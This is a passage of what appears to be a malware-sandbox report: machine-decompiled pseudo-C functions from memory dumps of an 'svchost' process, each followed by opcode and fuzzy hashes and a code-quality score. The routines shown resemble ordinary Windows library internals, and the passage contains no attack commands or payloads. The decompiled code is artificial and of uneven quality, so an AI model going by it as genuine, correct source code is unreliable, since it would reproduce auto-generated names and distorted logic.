                        										if((_t111 & 0x00000003) == 0) {
                        											_v1060 = _t118;
                        											__eflags = _t111;
                        											if(__eflags == 0) {
                        												goto L10;
                        											}
                        											_t42 = _t102 + 0xc; // 0xc
                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                        											_push(_t111);
                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                        											_push(0);
                        											_push( &_v1048);
                        											_t122 = E030613C0(_t102, _t118, _t122, __eflags);
                        											L44:
                        											_t118 = _v1072;
                        											goto L11;
                        										}
                        										_t122 = 0x80000002;
                        										goto L15;
                        									}
                        									_t122 = 0xc0000024;
                        									goto L44;
                        								}
                        								__eflags = _t114 - _t109;
                        								if(_t114 != _t109) {
                        									goto L59;
                        								}
                        								_t118 = 8;
                        								__eflags = _t77 - _t118;
                        								if(_t77 != _t118) {
                        									goto L34;
                        								}
                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        									goto L34;
                        								}
                        								_t112 = _v1056;
                        								_v1060 = _t118;
                        								__eflags = _t112;
                        								if(_t112 == 0) {
                        									goto L10;
                        								}
                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                        								goto L11;
                        							}
                        							__eflags = _t114 - _t118;
                        							if(_t114 != _t118) {
                        								goto L59;
                        							}
                        							__eflags = _t77 - _t118;
                        							if(_t77 != _t118) {
                        								goto L34;
                        							}
                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                        								goto L34;
                        							}
                        							_t113 = _v1056;
                        							_v1060 = _t118;
                        							__eflags = _t113;
                        							if(_t113 == 0) {
                        								goto L10;
                        							}
                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                        							goto L11;
                        						}
                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                        						__eflags = _t118 - _a20;
                        						if(_t118 <= _a20) {
                        							_t114 =  *(_t102 + 4);
                        							_t77 = _t118;
                        							goto L26;
                        						}
                        						_v1060 = _t118;
                        						goto L10;
                        					}
                        					__eflags = _t122 - 0x80000005;
                        					if(_t122 != 0x80000005) {
                        						goto L15;
                        					}
                        					L030477F0( *( *[fs:0x30] + 0x18), 0, _t102);
                        					L18:
                        					_t121 = _v1060;
                        					goto L19;
                        				}
                        				_push( &_v1060);
                        				_push(0x400);
                        				_t102 =  &_v1036;
                        				_push(_t102);
                        				_push(2);
                        				_push( &_v1048);
                        				_push(_t116);
                        				_t122 = E03069650();
                        				if(_t122 >= 0) {
                        					__eflags = 0;
                        					_v1052 = 0;
                        					goto L7;
                        				}
                        				if(_t122 == 0x80000005) {
                        					goto L18;
                        				}
                        				goto L4;
                        			}

                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 17237bcf4b7da7ac8845fd6f1fb3423b8fbae950077bfa87f59f03383991ba56
                        • Instruction ID: 94ba6b428ad90b34440d5190f6ad6796ca31b9718016a03252fe68d786b2b6ae
                        • Opcode Fuzzy Hash: 17237bcf4b7da7ac8845fd6f1fb3423b8fbae950077bfa87f59f03383991ba56
                        • Instruction Fuzzy Hash: B6819F766263019BEF65CE14C880B7FB3E8EF84A50F18496BED459B240D331DD40DBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 39%
                        			E030BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                        				char _v8;
                        				signed int _v12;
                        				signed int _t80;
                        				signed int _t83;
                        				intOrPtr _t89;
                        				signed int _t92;
                        				signed char _t106;
                        				signed int* _t107;
                        				intOrPtr _t108;
                        				intOrPtr _t109;
                        				signed int _t114;
                        				void* _t115;
                        				void* _t117;
                        				void* _t119;
                        				void* _t122;
                        				signed int _t123;
                        				signed int* _t124;
                        
                        				_t106 = _a12;
                        				if((_t106 & 0xfffffffc) != 0) {
                        					return 0xc000000d;
                        				}
                        				if((_t106 & 0x00000002) != 0) {
                        					_t106 = _t106 | 0x00000001;
                        				}
                        				_t109 =  *0x3117b9c; // 0x0
                        				_t124 = L03044620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                        				if(_t124 != 0) {
                        					 *_t124 =  *_t124 & 0x00000000;
                        					_t124[1] = _t124[1] & 0x00000000;
                        					_t124[4] = _t124[4] & 0x00000000;
                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                        						L13:
                        						_push(_t124);
                        						if((_t106 & 0x00000002) != 0) {
                        							_push(0x200);
                        							_push(0x28);
                        							_push(0xffffffff);
                        							_t122 = E03069800();
                        							if(_t122 < 0) {
                        								L33:
                        								if((_t124[4] & 0x00000001) != 0) {
                        									_push(4);
                        									_t64 =  &(_t124[1]); // 0x4
                        									_t107 = _t64;
                        									_push(_t107);
                        									_push(5);
                        									_push(0xfffffffe);
                        									E030695B0();
                        									if( *_t107 != 0) {
                        										_push( *_t107);
                        										E030695D0();
                        									}
                        								}
                        								_push(_t124);
                        								_push(0);
                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        								L37:
                        								L030477F0();
                        								return _t122;
                        							}
                        							_t124[4] = _t124[4] | 0x00000002;
                        							L18:
                        							_t108 = _a8;
                        							_t29 =  &(_t124[0x105]); // 0x414
                        							_t80 = _t29;
                        							_t30 =  &(_t124[5]); // 0x14
                        							_t124[3] = _t80;
                        							_t123 = 0;
                        							_t124[2] = _t30;
                        							 *_t80 = _t108;
                        							if(_t108 == 0) {
                        								L21:
                        								_t112 = 0x400;
                        								_push( &_v8);
                        								_v8 = 0x400;
                        								_push(_t124[2]);
                        								_push(0x400);
                        								_push(_t124[3]);
                        								_push(0);
                        								_push( *_t124);
                        								_t122 = E03069910();
                        								if(_t122 != 0xc0000023) {
                        									L26:
                        									if(_t122 != 0x106) {
                        										L40:
                        										if(_t122 < 0) {
                        											L29:
                        											_t83 = _t124[2];
                        											if(_t83 != 0) {
                        												_t59 =  &(_t124[5]); // 0x14
                        												if(_t83 != _t59) {
                        													L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                        												}
                        											}
                        											_push( *_t124);
                        											E030695D0();
                        											goto L33;
                        										}
                        										 *_a16 = _t124;
                        										return 0;
                        									}
                        									if(_t108 != 1) {
                        										_t122 = 0;
                        										goto L40;
                        									}
                        									_t122 = 0xc0000061;
                        									goto L29;
                        								} else {
                        									goto L22;
                        								}
                        								while(1) {
                        									L22:
                        									_t89 =  *0x3117b9c; // 0x0
                        									_t92 = L03044620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                        									_t124[2] = _t92;
                        									if(_t92 == 0) {
                        										break;
                        									}
                        									_t112 =  &_v8;
                        									_push( &_v8);
                        									_push(_t92);
                        									_push(_v8);
                        									_push(_t124[3]);
                        									_push(0);
                        									_push( *_t124);
                        									_t122 = E03069910();
                        									if(_t122 != 0xc0000023) {
                        										goto L26;
                        									}
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                        								}
                        								_t122 = 0xc0000017;
                        								goto L26;
                        							}
                        							_t119 = 0;
                        							do {
                        								_t114 = _t124[3];
                        								_t119 = _t119 + 0xc;
                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                        								_t123 = _t123 + 1;
                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                        							} while (_t123 < _t108);
                        							goto L21;
                        						}
                        						_push(0x28);
                        						_push(3);
                        						_t122 = E0302A7B0();
                        						if(_t122 < 0) {
                        							goto L33;
                        						}
                        						_t124[4] = _t124[4] | 0x00000001;
                        						goto L18;
                        					}
                        					if((_t106 & 0x00000001) == 0) {
                        						_t115 = 0x28;
                        						_t122 = E030BE7D3(_t115, _t124);
                        						if(_t122 < 0) {
                        							L9:
                        							_push(_t124);
                        							_push(0);
                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                        							goto L37;
                        						}
                        						L12:
                        						if( *_t124 != 0) {
                        							goto L18;
                        						}
                        						goto L13;
                        					}
                        					_t15 =  &(_t124[1]); // 0x4
                        					_t117 = 4;
                        					_t122 = E030BE7D3(_t117, _t15);
                        					if(_t122 >= 0) {
                        						_t124[4] = _t124[4] | 0x00000001;
                        						_v12 = _v12 & 0x00000000;
                        						_push(4);
                        						_push( &_v12);
                        						_push(5);
                        						_push(0xfffffffe);
                        						E030695B0();
                        						goto L12;
                        					}
                        					goto L9;
                        				} else {
                        					return 0xc0000017;
                        				}
                        			}





















                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f76e6f76a9619f5cde3aaa0cd40e744a888d8fdff61cb04b5bc79e5a0551440
                        • Instruction ID: 564bc184c294201cdd4aff97e9be4bfa34b6ea76151bb44f312ff128ba1b417f
                        • Opcode Fuzzy Hash: 0f76e6f76a9619f5cde3aaa0cd40e744a888d8fdff61cb04b5bc79e5a0551440
                        • Instruction Fuzzy Hash: 3471FF76602701EFD721DF18C944FEABBF5EF84720F184928E6558B6A0DBB1E940CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E030A6DC9(signed int __ecx, void* __edx) {
                        				unsigned int _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				char _v44;
                        				char _v48;
                        				char _v52;
                        				char _v56;
                        				char _v60;
                        				void* _t87;
                        				void* _t95;
                        				signed char* _t96;
                        				signed int _t107;
                        				signed int _t136;
                        				signed char* _t137;
                        				void* _t157;
                        				void* _t161;
                        				void* _t167;
                        				intOrPtr _t168;
                        				void* _t174;
                        				void* _t175;
                        				signed int _t176;
                        				void* _t177;
                        
                        				_t136 = __ecx;
                        				_v44 = 0;
                        				_t167 = __edx;
                        				_v40 = 0;
                        				_v36 = 0;
                        				_v32 = 0;
                        				_v60 = 0;
                        				_v56 = 0;
                        				_v52 = 0;
                        				_v48 = 0;
                        				_v16 = __ecx;
                        				_t87 = L03044620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                        				_t175 = _t87;
                        				if(_t175 != 0) {
                        					_t11 = _t175 + 0x30; // 0x30
                        					 *((short*)(_t175 + 6)) = 0x14d4;
                        					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                        					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                        					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                        					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                        					E030A6B4C(_t167, _t11, 0x214,  &_v8);
                        					_v12 = _v8 + 0x10;
                        					_t95 = E03047D50();
                        					_t137 = 0x7ffe0384;
                        					if(_t95 == 0) {
                        						_t96 = 0x7ffe0384;
                        					} else {
                        						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t175);
                        					_push(_v12);
                        					_push(0x402);
                        					_push( *_t96 & 0x000000ff);
                        					E03069AE0();
                        					_t87 = L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                        					_t176 = _v16;
                        					if((_t176 & 0x00000100) != 0) {
                        						_push( &_v36);
                        						_t157 = 4;
                        						_t87 = E030A795D( *((intOrPtr*)(_t167 + 8)), _t157);
                        						if(_t87 >= 0) {
                        							_v24 = E030A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                        							_v28 = E030A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                        							_push( &_v52);
                        							_t161 = 5;
                        							_t168 = E030A795D( *((intOrPtr*)(_t167 + 8)), _t161);
                        							_v20 = _t168;
                        							_t107 = L03044620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                        							_v16 = _t107;
                        							if(_t107 != 0) {
                        								_v8 = _v8 & 0x00000000;
                        								 *(_t107 + 0x20) = _t176;
                        								 *((short*)(_t107 + 6)) = 0x14d5;
                        								_t47 = _t107 + 0x24; // 0x24
                        								_t177 = _t47;
                        								E030A6B4C( &_v36, _t177, 0xc78,  &_v8);
                        								_t51 = _v8 + 4; // 0x4
                        								_t178 = _t177 + (_v8 >> 1) * 2;
                        								_v12 = _t51;
                        								E030A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_v12 = _v12 + _v8;
                        								E030A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                        								_t125 = _v8;
                        								_v12 = _v12 + _v8;
                        								E030A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                        								_t174 = _v12 + _v8;
                        								if(E03047D50() != 0) {
                        									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        								}
                        								_push(_v16);
                        								_push(_t174);
                        								_push(0x402);
                        								_push( *_t137 & 0x000000ff);
                        								E03069AE0();
                        								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                        								_t168 = _v20;
                        							}
                        							_t87 = L03042400( &_v36);
                        							if(_v24 >= 0) {
                        								_t87 = L03042400( &_v44);
                        							}
                        							if(_t168 >= 0) {
                        								_t87 = L03042400( &_v52);
                        							}
                        							if(_v28 >= 0) {
                        								return L03042400( &_v60);
                        							}
                        						}
                        					}
                        				}
                        				return _t87;
                        			}
































                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction ID: a87d5896fd699db4a9e9fea92b6495a9af1ddcb0d9facc3c76976b99412911a3
                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                        • Instruction Fuzzy Hash: 4F717A75A01609EFCB11DFA9D984EEEBBF9FF88704F144469E505AB250DB30EA41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E030252A5(char __ecx) {
                        				char _v20;
                        				char _v28;
                        				char _v29;
                        				void* _v32;
                        				void* _v36;
                        				void* _v37;
                        				void* _v38;
                        				void* _v40;
                        				void* _v46;
                        				void* _v64;
                        				void* __ebx;
                        				intOrPtr* _t49;
                        				signed int _t53;
                        				short _t85;
                        				signed int _t87;
                        				signed int _t88;
                        				signed int _t89;
                        				intOrPtr _t101;
                        				intOrPtr* _t102;
                        				intOrPtr* _t104;
                        				signed int _t106;
                        				void* _t108;
                        
                        				_t93 = __ecx;
                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                        				_push(_t88);
                        				_v29 = __ecx;
                        				_t89 = _t88 | 0xffffffff;
                        				while(1) {
                        					E0303EEF0(0x31179a0);
                        					_t104 =  *0x3118210; // 0x2803628
                        					if(_t104 == 0) {
                        						break;
                        					}
                        					asm("lock inc dword [esi]");
                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                        					E0303EB70(_t93, 0x31179a0);
                        					if( *((char*)(_t108 + 0xf)) != 0) {
                        						_t101 =  *0x7ffe02dc;
                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                        							L9:
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push(0x90028);
                        							_push(_t108 + 0x20);
                        							_push(0);
                        							_push(0);
                        							_push(0);
                        							_push( *((intOrPtr*)(_t104 + 4)));
                        							_t53 = E03069890();
                        							__eflags = _t53;
                        							if(_t53 >= 0) {
                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                        									E0303EEF0(0x31179a0);
                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                        									E0303EB70(0, 0x31179a0);
                        								}
                        								goto L3;
                        							}
                        							__eflags = _t53 - 0xc0000012;
                        							if(__eflags == 0) {
                        								L12:
                        								_t13 = _t104 + 0xc; // 0x2803635
                        								_t93 = _t13;
                        								 *((char*)(_t108 + 0x12)) = 0;
                        								__eflags = E0305F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								if(__eflags >= 0) {
                        									L15:
                        									_t102 = _v28;
                        									 *_t102 = 2;
                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        									E0303EEF0(0x31179a0);
                        									__eflags =  *0x3118210 - _t104; // 0x2803628
                        									if(__eflags == 0) {
                        										__eflags =  *((char*)(_t108 + 0xe));
                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                        										 *0x3118210 = _t102;
                        										_t32 = _t102 + 0xc; // 0x0
                        										 *_t95 =  *_t32;
                        										_t33 = _t102 + 0x10; // 0x0
                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                        										_t35 = _t102 + 4; // 0xffffffff
                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                        										if(__eflags != 0) {
                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                        											E030A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                        										}
                        										E0303EB70(_t95, 0x31179a0);
                        										asm("lock xadd [esi], eax");
                        										if(__eflags == 0) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E030695D0();
                        											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										asm("lock xadd [esi], ebx");
                        										__eflags = _t89 == 1;
                        										if(_t89 == 1) {
                        											_push( *((intOrPtr*)(_t104 + 4)));
                        											E030695D0();
                        											L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        										}
                        										_t49 = _t102;
                        										L4:
                        										return _t49;
                        									}
                        									E0303EB70(_t93, 0x31179a0);
                        									asm("lock xadd [esi], eax");
                        									if(__eflags == 0) {
                        										_push( *((intOrPtr*)(_t104 + 4)));
                        										E030695D0();
                        										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                        									}
                        									 *_t102 = 1;
                        									asm("lock xadd [edi], eax");
                        									if(__eflags == 0) {
                        										_t28 = _t102 + 4; // 0xffffffff
                        										_push( *_t28);
                        										E030695D0();
                        										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                        									}
                        									continue;
                        								}
                        								_t93 =  &_v20;
                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                        								_t85 = 6;
                        								_v20 = _t85;
                        								_t87 = E0305F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                        								__eflags = _t87;
                        								if(_t87 < 0) {
                        									goto L3;
                        								}
                        								 *((char*)(_t108 + 0xe)) = 1;
                        								goto L15;
                        							}
                        							__eflags = _t53 - 0xc000026e;
                        							if(__eflags != 0) {
                        								goto L3;
                        							}
                        							goto L12;
                        						}
                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                        							goto L3;
                        						} else {
                        							goto L9;
                        						}
                        					}
                        					L3:
                        					_t49 = _t104;
                        					goto L4;
                        				}
                        				_t49 = 0;
                        				goto L4;
                        			}


























                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0468d600b39b82b76da3a3c33ffdfbb0e7e54dacb97b8a532e2cf0e4db3a93db
                        • Instruction ID: 079ca40c3f92958fe78d54bc738c14a285916f3e66a2e0f10466ca356da1f763
                        • Opcode Fuzzy Hash: 0468d600b39b82b76da3a3c33ffdfbb0e7e54dacb97b8a532e2cf0e4db3a93db
                        • Instruction Fuzzy Hash: 3B51EE75206741AFC721EF28C941BABFBE8FF85710F14092AE4958BA91E770E848C795
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E03052AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                        				signed short* _v8;
                        				signed short* _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr* _v28;
                        				signed int _v32;
                        				signed int _v36;
                        				short _t56;
                        				signed int _t57;
                        				intOrPtr _t58;
                        				signed short* _t61;
                        				intOrPtr _t72;
                        				intOrPtr _t75;
                        				intOrPtr _t84;
                        				intOrPtr _t87;
                        				intOrPtr* _t90;
                        				signed short* _t91;
                        				signed int _t95;
                        				signed short* _t96;
                        				intOrPtr _t97;
                        				intOrPtr _t102;
                        				signed int _t108;
                        				intOrPtr _t110;
                        				signed int _t111;
                        				signed short* _t112;
                        				void* _t113;
                        				signed int _t116;
                        				signed short** _t119;
                        				short* _t120;
                        				signed int _t123;
                        				signed int _t124;
                        				void* _t125;
                        				intOrPtr _t127;
                        				signed int _t128;
                        
                        				_t90 = __ecx;
                        				_v16 = __edx;
                        				_t108 = _a4;
                        				_v28 = __ecx;
                        				_t4 = _t108 - 1; // -1
                        				if(_t4 > 0x13) {
                        					L15:
                        					_t56 = 0xc0000100;
                        					L16:
                        					return _t56;
                        				}
                        				_t57 = _t108 * 0x1c;
                        				_v32 = _t57;
                        				_t6 = _t57 + 0x3118204; // 0x0
                        				_t123 =  *_t6;
                        				_t7 = _t57 + 0x3118208; // 0x3118207
                        				_t8 = _t57 + 0x3118208; // 0x3118207
                        				_t119 = _t8;
                        				_v36 = _t123;
                        				_t110 = _t7 + _t123 * 8;
                        				_v24 = _t110;
                        				_t111 = _a4;
                        				if(_t119 >= _t110) {
                        					L12:
                        					if(_t123 != 3) {
                        						_t58 =  *0x3118450; // 0x0
                        						if(_t58 == 0) {
                        							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
                        						}
                        					} else {
                        						_t26 = _t57 + 0x311821c; // 0x0
                        						_t58 =  *_t26;
                        					}
                        					 *_t90 = _t58;
                        					goto L15;
                        				} else {
                        					goto L2;
                        				}
                        				while(1) {
                        					_t116 =  *_t61 & 0x0000ffff;
                        					_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        					if(_t116 == _t128) {
                        						goto L18;
                        					}
                        					L5:
                        					if(_t116 >= 0x61) {
                        						if(_t116 > 0x7a) {
                        							_t97 =  *0x3116d5c; // 0x7f8b0654
                        							_t72 =  *0x3116d5c; // 0x7f8b0654
                        							_t75 =  *0x3116d5c; // 0x7f8b0654
                        							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
                        						} else {
                        							_t116 = _t116 - 0x20;
                        						}
                        					}
                        					if(_t128 >= 0x61) {
                        						if(_t128 > 0x7a) {
                        							_t102 =  *0x3116d5c; // 0x7f8b0654
                        							_t84 =  *0x3116d5c; // 0x7f8b0654
                        							_t87 =  *0x3116d5c; // 0x7f8b0654
                        							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
                        						} else {
                        							_t128 = _t128 - 0x20;
                        						}
                        					}
                        					if(_t116 == _t128) {
                        						_t61 = _v12;
                        						_t96 = _v8;
                        					} else {
                        						_t113 = _t116 - _t128;
                        						L9:
                        						_t111 = _a4;
                        						if(_t113 == 0) {
                        							_t115 =  &(( *_t119)[_t111 + 1]);
                        							_t33 =  &(_t119[1]); // 0x100
                        							_t120 = _a8;
                        							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
                        							_t35 = _t95 - 1; // 0xff
                        							_t124 = _t35;
                        							if(_t120 == 0) {
                        								L27:
                        								 *_a16 = _t95;
                        								_t56 = 0xc0000023;
                        								goto L16;
                        							}
                        							if(_t124 >= _a12) {
                        								if(_a12 >= 1) {
                        									 *_t120 = 0;
                        								}
                        								goto L27;
                        							}
                        							 *_a16 = _t124;
                        							_t125 = _t124 + _t124;
                        							E0306F3E0(_t120, _t115, _t125);
                        							_t56 = 0;
                        							 *((short*)(_t125 + _t120)) = 0;
                        							goto L16;
                        						}
                        						_t119 =  &(_t119[2]);
                        						if(_t119 < _v24) {
                        							L2:
                        							_t91 =  *_t119;
                        							_t61 = _t91;
                        							_v12 = _t61;
                        							_t112 =  &(_t61[_t111]);
                        							_v8 = _t112;
                        							if(_t61 >= _t112) {
                        								break;
                        							} else {
                        								_t127 = _v16 - _t91;
                        								_t96 = _t112;
                        								_v20 = _t127;
                        								_t116 =  *_t61 & 0x0000ffff;
                        								_t128 =  *(_t127 + _t61) & 0x0000ffff;
                        								if(_t116 == _t128) {
                        									goto L18;
                        								}
                        								goto L5;
                        							}
                        						} else {
                        							_t90 = _v28;
                        							_t57 = _v32;
                        							_t123 = _v36;
                        							goto L12;
                        						}
                        					}
                        					L18:
                        					_t61 =  &(_t61[1]);
                        					_v12 = _t61;
                        					if(_t61 >= _t96) {
                        						break;
                        					}
                        					_t127 = _v20;
                        				}
                        				_t113 = 0;
                        				goto L9;
                        			}


                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ecf9fd7a436f7b60c48016a388d316fd5338e55b7dad063c5daa3dd12ba9abfe
                        • Instruction ID: 40daa9a92d38175e6d7207532e0b37b586d12f94ea6b50c99252af069fbc4c8c
                        • Opcode Fuzzy Hash: ecf9fd7a436f7b60c48016a388d316fd5338e55b7dad063c5daa3dd12ba9abfe
                        • Instruction Fuzzy Hash: 95518E76A011258FDB18DF1CC8909BEB7B9BF88700715895AFC46AB314D731AA91CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E030EAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
                        				signed int _v8;
                        				signed int _v12;
                        				void* __esi;
                        				void* __ebp;
                        				signed short* _t36;
                        				signed int _t41;
                        				char* _t42;
                        				intOrPtr _t43;
                        				signed int _t47;
                        				void* _t52;
                        				signed int _t57;
                        				intOrPtr _t61;
                        				signed char _t62;
                        				signed int _t72;
                        				signed char _t85;
                        				signed int _t88;
                        
                        				_t73 = __edx;
                        				_push(__ecx);
                        				_t85 = __ecx;
                        				_v8 = __edx;
